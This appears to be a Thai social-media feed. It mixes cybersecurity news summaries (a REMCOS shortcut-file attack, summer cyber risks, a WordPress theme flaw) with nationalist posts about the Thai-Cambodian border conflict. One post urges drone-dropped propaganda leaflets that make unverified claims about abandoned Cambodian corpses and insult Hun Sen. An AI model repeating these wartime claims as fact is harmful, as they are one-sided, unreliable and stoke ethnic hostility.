สามารถทำงานแบบ fileless โดยไม่ทิ้งร่องรอยบนดิสก์ ⛔ ยากต่อการตรวจจับด้วย antivirus แบบดั้งเดิม ⛔ ต้องใช้ระบบป้องกันแบบ real-time และ behavioral analysis ‼️ การปลอมชื่อไฟล์และไอคอนทำให้ผู้ใช้หลงเชื่อว่าเป็นไฟล์จริง ⛔ Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น ⛔ ไฟล์ .lnk อาจดูเหมือน “Invoice.pdf” ทั้งที่เป็น shortcut ‼️ การเปิดไฟล์จากอีเมลหรือเครือข่ายที่ไม่ปลอดภัยอาจนำไปสู่การติดมัลแวร์ทันที ⛔ ไม่ควรเปิดไฟล์แนบจากผู้ส่งที่ไม่รู้จัก ⛔ ควรใช้ sandbox หรือระบบแยกเพื่อทดสอบไฟล์ก่อนเปิด https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
    HACKREAD.COM
    New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 35 Views 0 Reviews
  • กองทัพไทยยันข่าวปลอม! ปฏิเสธข่าวลืออพยพคนสุรินทร์ ย้ำยังคงหยุดยิงแต่พร้อมรับมือเขมร ยันปล่อย 18 เชลยเมื่อรบจบ ไม่ใช่แค่หยุดยิง จับชาวเขมรต้องสงสัยสอดแนมชายแดนไทย
    .
    อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073614

    #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    กองทัพไทยยันข่าวปลอม! ปฏิเสธข่าวลืออพยพคนสุรินทร์ ย้ำยังคงหยุดยิงแต่พร้อมรับมือเขมร ยันปล่อย 18 เชลยเมื่อรบจบ ไม่ใช่แค่หยุดยิง จับชาวเขมรต้องสงสัยสอดแนมชายแดนไทย . อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073614 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 Comments 0 Shares 167 Views 0 Reviews
  • #โดรนไทยแจกใบปลิวในเขมรบอกชาวเขมรว่าฮุนเซนทิ้งศพจนเน่าของทหารเขมรตายเป็นหมื่นศพ.
    #โดรนไทยทิ้งใบปลิวบอกชาวเขมรว่าฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ.

    #ฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ.

    ..สื่อไทยเราปั่นกระแสโหนกระแสมากๆเลยว่าฮุนเซนฮุนมาเนตทิ้งศพเขมรเป็นหมื่นๆศพเน่าคาชายแดน,หากเขมรเชื่อข่าวปลอมบิดเบือนแบบมาลีมันนักก็มีใครก็ได้สร้างคลิปทหารเขมรตายกว่าหมื่นศพแต่ฮุนเซนไม่มาเก็บศพให้ญาติทหารเขมรที่ตาย,โหนกระแสสร้างความเกียจชังแก่ฮุนเซนโดยชาวเขมรเลย,ถ้านายใหญ่ในไทยโทรสั่งบอกสื่ออย่าเล่นข่าวนี้แก่ฮุนเซนปกป้องฮุนเซนช่วยกูมากๆด้วยอย่าทำเครดิตฮุนเซนกูตกต่ำแบบนายใหญ่สั่งทหารไทยอย่าตอบโต้ทหารเขมรแบบนั้นล่ะ สื่อไทยเราโหนกระแสนี้ทุกๆวันเลย เช้า เที่ยง เย็น ดึกด้วย ,ให้พ่อมันแบบมาเลย์แบบอเมริกา ให้ชาวเขมรเรียกร้องอเมริกาช่วยฮุนเซนฮุนมาเน็ตนำทหารมาเลย์นำทหารอเมริกามาเก็บกู้ซากศพทหารเขมรให้ญาติทหารเขมรไปประกอบพิธีทางศาสนาด้วยเพื่อความเป็นมนุษยธรรมนั้นล่ะเป็นคนกลางแล้วมาช่วยเจรจาสงบศึกหยุดยิงด้วย,บุกดงกับระเบิดที่ทหารเขมรวางเองช่วยไปเก็บกู้ซากศพทหารเขมรให้ประชาชนชาวเขมรด้วย.

    ใช้โดรนเราทิ้งใบปลิวเป็นภาษาเขมรว่า ฮุนเซนฮุนมาเซนทิ้งศพทหารญาติของทหารเขมรกว่าหมื่นศพทั่วหมู่บ้านเขมรที่โดรนเราบินกลับไปถึงชาวบ้านมันได้,บินไปชุมชนเมืองใหญ่ๆมันด้วยเลย,เหยียบหยามว่าโดรนไทยก็มาถึงถิ่นมรึงได้,บวกทิ้งโปรยข่าวด้วยมืออีกว่ามรึง!!ฮุนเซนและฮุนมาเนตทิ้งศพทหารเขมรจนเน่าคาป่าไม่เก็บกู้ให้เกียรติทหารเขมรที่ตายและญาติของทหารไร้มนุษยธรรมขาดภาวะผู้นำทัพที่ดีอัดท้ายใบปลิวข่าวเป็นภาษาเขมรกับฮุนเซนมีมันส์กับนางมาลีแทนเมียหลวงมันอีก,ได้บันเทิงแน่นอน,ปิดทางเน็ตได้แต่ปิดทางตีนทางมือทำเองพื้นๆไม่ได้แน่นอน,ประชาชนติดพรมแดนเอาโดนบินไปฝั่งมันก็น่าจะได้นะ ทหารไทยเราไม่สะดวกก็จัดแทนเลย,ทหารไทยเราอย่าตั้งรับอย่างเดียว,มุกนี้ทำลายขวัญกำลังใจมันสดๆร้อนๆได้.กลยุทธทางทหารอีกมุม,เหี้ยให้มันบินโดรนมาก่อกวนเราฝ่ายเดียวทำไม,บินโดรนแบบนี้ทิ้งบอกว่าฮุนเซนทิ้งศพทหารเป็นหมื่นไปเลย.

    https://youtube.com/watch?v=BdOokE0rHO8&si=HNQv1Khb3rKHzwU-
    #โดรนไทยแจกใบปลิวในเขมรบอกชาวเขมรว่าฮุนเซนทิ้งศพจนเน่าของทหารเขมรตายเป็นหมื่นศพ. #โดรนไทยทิ้งใบปลิวบอกชาวเขมรว่าฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ. #ฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ. ..สื่อไทยเราปั่นกระแสโหนกระแสมากๆเลยว่าฮุนเซนฮุนมาเนตทิ้งศพเขมรเป็นหมื่นๆศพเน่าคาชายแดน,หากเขมรเชื่อข่าวปลอมบิดเบือนแบบมาลีมันนักก็มีใครก็ได้สร้างคลิปทหารเขมรตายกว่าหมื่นศพแต่ฮุนเซนไม่มาเก็บศพให้ญาติทหารเขมรที่ตาย,โหนกระแสสร้างความเกียจชังแก่ฮุนเซนโดยชาวเขมรเลย,ถ้านายใหญ่ในไทยโทรสั่งบอกสื่ออย่าเล่นข่าวนี้แก่ฮุนเซนปกป้องฮุนเซนช่วยกูมากๆด้วยอย่าทำเครดิตฮุนเซนกูตกต่ำแบบนายใหญ่สั่งทหารไทยอย่าตอบโต้ทหารเขมรแบบนั้นล่ะ สื่อไทยเราโหนกระแสนี้ทุกๆวันเลย เช้า เที่ยง เย็น ดึกด้วย ,ให้พ่อมันแบบมาเลย์แบบอเมริกา ให้ชาวเขมรเรียกร้องอเมริกาช่วยฮุนเซนฮุนมาเน็ตนำทหารมาเลย์นำทหารอเมริกามาเก็บกู้ซากศพทหารเขมรให้ญาติทหารเขมรไปประกอบพิธีทางศาสนาด้วยเพื่อความเป็นมนุษยธรรมนั้นล่ะเป็นคนกลางแล้วมาช่วยเจรจาสงบศึกหยุดยิงด้วย,บุกดงกับระเบิดที่ทหารเขมรวางเองช่วยไปเก็บกู้ซากศพทหารเขมรให้ประชาชนชาวเขมรด้วย. ใช้โดรนเราทิ้งใบปลิวเป็นภาษาเขมรว่า ฮุนเซนฮุนมาเซนทิ้งศพทหารญาติของทหารเขมรกว่าหมื่นศพทั่วหมู่บ้านเขมรที่โดรนเราบินกลับไปถึงชาวบ้านมันได้,บินไปชุมชนเมืองใหญ่ๆมันด้วยเลย,เหยียบหยามว่าโดรนไทยก็มาถึงถิ่นมรึงได้,บวกทิ้งโปรยข่าวด้วยมืออีกว่ามรึง!!ฮุนเซนและฮุนมาเนตทิ้งศพทหารเขมรจนเน่าคาป่าไม่เก็บกู้ให้เกียรติทหารเขมรที่ตายและญาติของทหารไร้มนุษยธรรมขาดภาวะผู้นำทัพที่ดีอัดท้ายใบปลิวข่าวเป็นภาษาเขมรกับฮุนเซนมีมันส์กับนางมาลีแทนเมียหลวงมันอีก,ได้บันเทิงแน่นอน,ปิดทางเน็ตได้แต่ปิดทางตีนทางมือทำเองพื้นๆไม่ได้แน่นอน,ประชาชนติดพรมแดนเอาโดนบินไปฝั่งมันก็น่าจะได้นะ ทหารไทยเราไม่สะดวกก็จัดแทนเลย,ทหารไทยเราอย่าตั้งรับอย่างเดียว,มุกนี้ทำลายขวัญกำลังใจมันสดๆร้อนๆได้.กลยุทธทางทหารอีกมุม,เหี้ยให้มันบินโดรนมาก่อกวนเราฝ่ายเดียวทำไม,บินโดรนแบบนี้ทิ้งบอกว่าฮุนเซนทิ้งศพทหารเป็นหมื่นไปเลย. https://youtube.com/watch?v=BdOokE0rHO8&si=HNQv1Khb3rKHzwU-
    0 Comments 0 Shares 75 Views 0 Reviews
  • โรงงานเฟกนิวส์! ผู้ใช้โซเชียลมีเดียชาวกัมพูชายังคงผลิตข่าวปลอมออกมาต่อเนื่อง ล่าสุดปั้นน้ำอ้างทหารตายเพราะโดนแก๊สพิษจากไทย

    อ่านต่อ..https://news1live.com/detail/9680000073215

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire


    โรงงานเฟกนิวส์! ผู้ใช้โซเชียลมีเดียชาวกัมพูชายังคงผลิตข่าวปลอมออกมาต่อเนื่อง ล่าสุดปั้นน้ำอ้างทหารตายเพราะโดนแก๊สพิษจากไทย อ่านต่อ..https://news1live.com/detail/9680000073215 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    Haha
    2
    1 Comments 0 Shares 360 Views 0 Reviews
  • เรื่องเล่าจากข่าว: ฤดูร้อน—ช่วงเวลาทองของแฮกเกอร์ และบทเรียนที่องค์กรต้องไม่ละเลย

    ฤดูร้อนมักเป็นช่วงที่คนทำงานหยุดพัก เดินทางไกล หรือทำงานจากสถานที่ที่ไม่คุ้นเคย เช่น บ้านพักตากอากาศ โรงแรม หรือสนามบิน ซึ่งมักใช้ Wi-Fi สาธารณะที่ไม่มีการเข้ารหัสหรือระบบป้องกันที่ดีพอ

    ในขณะเดียวกัน ทีม IT และฝ่ายรักษาความปลอดภัยไซเบอร์ขององค์กรก็ลดกำลังลงจากการลาพักร้อน ทำให้การตรวจสอบภัยคุกคามลดลงอย่างเห็นได้ชัด

    ผลคือ แฮกเกอร์ใช้โอกาสนี้ในการโจมตีแบบ phishing, ransomware และการขโมยข้อมูลผ่านเครือข่ายปลอม โดยเฉพาะการปลอมอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ซึ่งดูเหมือนจริงจนผู้ใช้หลงเชื่อ

    ข้อมูลจากหลายแหล่งระบุว่า การโจมตีไซเบอร์ในฤดูร้อนเพิ่มขึ้นเฉลี่ย 30% โดยเฉพาะในกลุ่มองค์กรที่มีการทำงานแบบ remote และไม่มีนโยบายรักษาความปลอดภัยที่ชัดเจน

    ฤดูร้อนเป็นช่วงที่การโจมตีไซเบอร์เพิ่มขึ้นอย่างมีนัยสำคัญ
    การโจมตีเพิ่มขึ้นเฉลี่ย 30% ในช่วงเดือนมิถุนายน–สิงหาคม
    เกิดจากการลดกำลังของทีม IT และการใช้เครือข่ายที่ไม่ปลอดภัย

    ผู้ใช้มักเชื่อมต่อ Wi-Fi สาธารณะจากโรงแรม สนามบิน หรือบ้านพัก โดยไม่รู้ว่ามีความเสี่ยง
    เสี่ยงต่อการถูกดักข้อมูลหรือปลอมเครือข่าย
    อุปกรณ์ส่วนตัวมักไม่มีระบบป้องกันเท่ากับอุปกรณ์องค์กร

    แฮกเกอร์ใช้ phishing ที่เลียนแบบอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก
    หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตหรือรหัสผ่าน
    ใช้เทคนิคที่เหมือนจริงมากขึ้นด้วย generative AI

    องค์กรมักเลื่อนการอัปเดตระบบและการตรวจสอบความปลอดภัยไปหลังช่วงพักร้อน
    ทำให้เกิดช่องโหว่ที่แฮกเกอร์สามารถเจาะเข้าได้ง่าย
    ไม่มีการสำรองข้อมูลหรือทดสอบระบบอย่างสม่ำเสมอ

    ภัยคุกคามที่พบบ่อยในฤดูร้อน ได้แก่ ransomware, credential theft และ shadow IT
    การใช้แอปที่ไม่ได้รับอนุญาตหรือแชร์ไฟล์ผ่านช่องทางที่ไม่ปลอดภัย
    การขโมยข้อมูลบัญชีผ่านการดักจับการสื่อสาร

    การใช้อุปกรณ์ส่วนตัวที่ไม่มีระบบป้องกันเข้าถึงข้อมูลองค์กรเป็นช่องโหว่สำคัญ
    ไม่มีการเข้ารหัสหรือระบบป้องกันไวรัส
    เสี่ยงต่อการถูกขโมยข้อมูลหรือเข้าถึงระบบภายใน

    การลดกำลังทีม IT ในช่วงฤดูร้อนทำให้การตอบสนองต่อภัยคุกคามล่าช้า
    แฮกเกอร์สามารถแฝงตัวในระบบได้นานขึ้น
    อาจเกิดการโจมตีแบบ ransomware โดยไม่มีใครตรวจพบ

    การไม่มีแผนรับมือหรือผู้รับผิดชอบเมื่อเกิดเหตุการณ์ไซเบอร์อาจทำให้ความเสียหายขยายตัว
    ไม่มีการแจ้งเตือนหรือกู้คืนข้อมูลทันเวลา
    องค์กรอาจสูญเสียข้อมูลสำคัญหรือความน่าเชื่อถือ

    การใช้ Wi-Fi สาธารณะโดยไม่ใช้ VPN หรือระบบป้องกันเป็นพฤติกรรมเสี่ยงสูง
    ข้อมูลส่วนตัวและข้อมูลองค์กรอาจถูกดักจับ
    เสี่ยงต่อการถูกโจมตีแบบ man-in-the-middle

    https://www.csoonline.com/article/4030931/summer-why-cybersecurity-needs-to-be-further-strengthened.html
    🎙️ เรื่องเล่าจากข่าว: ฤดูร้อน—ช่วงเวลาทองของแฮกเกอร์ และบทเรียนที่องค์กรต้องไม่ละเลย ฤดูร้อนมักเป็นช่วงที่คนทำงานหยุดพัก เดินทางไกล หรือทำงานจากสถานที่ที่ไม่คุ้นเคย เช่น บ้านพักตากอากาศ โรงแรม หรือสนามบิน ซึ่งมักใช้ Wi-Fi สาธารณะที่ไม่มีการเข้ารหัสหรือระบบป้องกันที่ดีพอ ในขณะเดียวกัน ทีม IT และฝ่ายรักษาความปลอดภัยไซเบอร์ขององค์กรก็ลดกำลังลงจากการลาพักร้อน ทำให้การตรวจสอบภัยคุกคามลดลงอย่างเห็นได้ชัด ผลคือ แฮกเกอร์ใช้โอกาสนี้ในการโจมตีแบบ phishing, ransomware และการขโมยข้อมูลผ่านเครือข่ายปลอม โดยเฉพาะการปลอมอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ซึ่งดูเหมือนจริงจนผู้ใช้หลงเชื่อ ข้อมูลจากหลายแหล่งระบุว่า การโจมตีไซเบอร์ในฤดูร้อนเพิ่มขึ้นเฉลี่ย 30% โดยเฉพาะในกลุ่มองค์กรที่มีการทำงานแบบ remote และไม่มีนโยบายรักษาความปลอดภัยที่ชัดเจน ✅ ฤดูร้อนเป็นช่วงที่การโจมตีไซเบอร์เพิ่มขึ้นอย่างมีนัยสำคัญ ➡️ การโจมตีเพิ่มขึ้นเฉลี่ย 30% ในช่วงเดือนมิถุนายน–สิงหาคม ➡️ เกิดจากการลดกำลังของทีม IT และการใช้เครือข่ายที่ไม่ปลอดภัย ✅ ผู้ใช้มักเชื่อมต่อ Wi-Fi สาธารณะจากโรงแรม สนามบิน หรือบ้านพัก โดยไม่รู้ว่ามีความเสี่ยง ➡️ เสี่ยงต่อการถูกดักข้อมูลหรือปลอมเครือข่าย ➡️ อุปกรณ์ส่วนตัวมักไม่มีระบบป้องกันเท่ากับอุปกรณ์องค์กร ✅ แฮกเกอร์ใช้ phishing ที่เลียนแบบอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ➡️ หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตหรือรหัสผ่าน ➡️ ใช้เทคนิคที่เหมือนจริงมากขึ้นด้วย generative AI ✅ องค์กรมักเลื่อนการอัปเดตระบบและการตรวจสอบความปลอดภัยไปหลังช่วงพักร้อน ➡️ ทำให้เกิดช่องโหว่ที่แฮกเกอร์สามารถเจาะเข้าได้ง่าย ➡️ ไม่มีการสำรองข้อมูลหรือทดสอบระบบอย่างสม่ำเสมอ ✅ ภัยคุกคามที่พบบ่อยในฤดูร้อน ได้แก่ ransomware, credential theft และ shadow IT ➡️ การใช้แอปที่ไม่ได้รับอนุญาตหรือแชร์ไฟล์ผ่านช่องทางที่ไม่ปลอดภัย ➡️ การขโมยข้อมูลบัญชีผ่านการดักจับการสื่อสาร ‼️ การใช้อุปกรณ์ส่วนตัวที่ไม่มีระบบป้องกันเข้าถึงข้อมูลองค์กรเป็นช่องโหว่สำคัญ ⛔ ไม่มีการเข้ารหัสหรือระบบป้องกันไวรัส ⛔ เสี่ยงต่อการถูกขโมยข้อมูลหรือเข้าถึงระบบภายใน ‼️ การลดกำลังทีม IT ในช่วงฤดูร้อนทำให้การตอบสนองต่อภัยคุกคามล่าช้า ⛔ แฮกเกอร์สามารถแฝงตัวในระบบได้นานขึ้น ⛔ อาจเกิดการโจมตีแบบ ransomware โดยไม่มีใครตรวจพบ ‼️ การไม่มีแผนรับมือหรือผู้รับผิดชอบเมื่อเกิดเหตุการณ์ไซเบอร์อาจทำให้ความเสียหายขยายตัว ⛔ ไม่มีการแจ้งเตือนหรือกู้คืนข้อมูลทันเวลา ⛔ องค์กรอาจสูญเสียข้อมูลสำคัญหรือความน่าเชื่อถือ ‼️ การใช้ Wi-Fi สาธารณะโดยไม่ใช้ VPN หรือระบบป้องกันเป็นพฤติกรรมเสี่ยงสูง ⛔ ข้อมูลส่วนตัวและข้อมูลองค์กรอาจถูกดักจับ ⛔ เสี่ยงต่อการถูกโจมตีแบบ man-in-the-middle https://www.csoonline.com/article/4030931/summer-why-cybersecurity-needs-to-be-further-strengthened.html
    WWW.CSOONLINE.COM
    Summer: Why cybersecurity must be strengthened as vacations abound
    Letting your guard down is not the most reasonable thing to do at a time when cybersecurity risks are on the rise; cyber attackers are not resting. What's more, they are well aware of what happens at this time of year, hence they take advantage of the circumstance to launch more aggressive campaigns.
    0 Comments 0 Shares 91 Views 0 Reviews
  • ทูต ทหาร และสื่อต่างประเทศ รับทราบข้อเท็จจริงกรณีสถานการณ์แนวชายแดนไทย-กัมพูชา
    https://www.thai-tai.tv/news/20705/
    .
    #ไทยไท #ชายแดนไทยกัมพูชา #อุบลราชธานี #ความโปร่งใส #ทูตนานาชาติ #กองทัพไทย #ข่าวปลอม #การป้องกันตนเอง #ความสูญเสีย #อพยพ
    ทูต ทหาร และสื่อต่างประเทศ รับทราบข้อเท็จจริงกรณีสถานการณ์แนวชายแดนไทย-กัมพูชา https://www.thai-tai.tv/news/20705/ . #ไทยไท #ชายแดนไทยกัมพูชา #อุบลราชธานี #ความโปร่งใส #ทูตนานาชาติ #กองทัพไทย #ข่าวปลอม #การป้องกันตนเอง #ความสูญเสีย #อพยพ
    0 Comments 0 Shares 84 Views 0 Reviews
  • ♣ เขมรปั่นข่าวปลอมระงับขายกริพเพน ส่วนหุ้นบริษัทผู้ผลิตพุ่งหลังไทยรีวิวคุณภาพเป็นเจ้าแรก ทรงนี้มีแต่จะเพิ่มจำนวนฝูงบินนะเหม
    #7ดอกจิก
    ♣ เขมรปั่นข่าวปลอมระงับขายกริพเพน ส่วนหุ้นบริษัทผู้ผลิตพุ่งหลังไทยรีวิวคุณภาพเป็นเจ้าแรก ทรงนี้มีแต่จะเพิ่มจำนวนฝูงบินนะเหม #7ดอกจิก
    0 Comments 0 Shares 100 Views 0 Reviews
  • เปิดหลักฐานชุดใหญ่! โฆษกรัฐบาลยันไทยใช้สิทธิป้องกันตนเอง กัมพูชาป่วนชายแดน พุ่งเป้า โจมตี"พลเรือน" - บิดเบือนข้อมูล
    https://www.thai-tai.tv/news/20685/
    .
    #ไทยไท #ThailandFactMission #TruthfromThailand #สถานการณ์ไทยกัมพูชา #กองทัพไทย #ชายแดนไทยกัมพูชา #ความขัดแย้งชายแดน #กฎหมายระหว่างประเทศ #ข่าวปลอม
    เปิดหลักฐานชุดใหญ่! โฆษกรัฐบาลยันไทยใช้สิทธิป้องกันตนเอง กัมพูชาป่วนชายแดน พุ่งเป้า โจมตี"พลเรือน" - บิดเบือนข้อมูล https://www.thai-tai.tv/news/20685/ . #ไทยไท #ThailandFactMission #TruthfromThailand #สถานการณ์ไทยกัมพูชา #กองทัพไทย #ชายแดนไทยกัมพูชา #ความขัดแย้งชายแดน #กฎหมายระหว่างประเทศ #ข่าวปลอม
    0 Comments 0 Shares 98 Views 0 Reviews
  • ผบก.สอท.1 เร่งประสาน กระทรวงดีอี ปิดกั้นข่าวปลอมจากสื่อโซเชี่ยลกัมพูชา สร้างความสับสน แนะคนไทยติดตามข่าวสารจากเพจทางการเท่านั้น

    อ่านต่อ..https://news1live.com/detail/9680000072781

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    ผบก.สอท.1 เร่งประสาน กระทรวงดีอี ปิดกั้นข่าวปลอมจากสื่อโซเชี่ยลกัมพูชา สร้างความสับสน แนะคนไทยติดตามข่าวสารจากเพจทางการเท่านั้น อ่านต่อ..https://news1live.com/detail/9680000072781 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 Comments 0 Shares 347 Views 0 Reviews
  • เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ

    ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก

    แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ:
    - สร้างบัญชีแอดมินปลอม
    - อัปโหลดมัลแวร์
    - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง
    - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น

    ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394
    คะแนนความรุนแรง 9.8/10
    เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5
    เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป
    ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี

    Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว
    เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025
    ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip

    แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ
    ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย
    อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน

    ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก
    มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery
    เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร

    หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที
    ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน
    อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้

    การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ
    แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด
    อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก

    ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน
    เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins
    ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด

    การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก
    ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่
    ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย

    https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    🎙️ เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ: - สร้างบัญชีแอดมินปลอม - อัปโหลดมัลแวร์ - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น ✅ ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ➡️ คะแนนความรุนแรง 9.8/10 ➡️ เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล ✅ ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ➡️ เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป ➡️ ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว ➡️ เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025 ➡️ ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip ✅ แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ ➡️ ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย ➡️ อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน ✅ ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก ➡️ มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery ➡️ เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร ‼️ หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที ⛔ ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน ⛔ อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้ ‼️ การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ 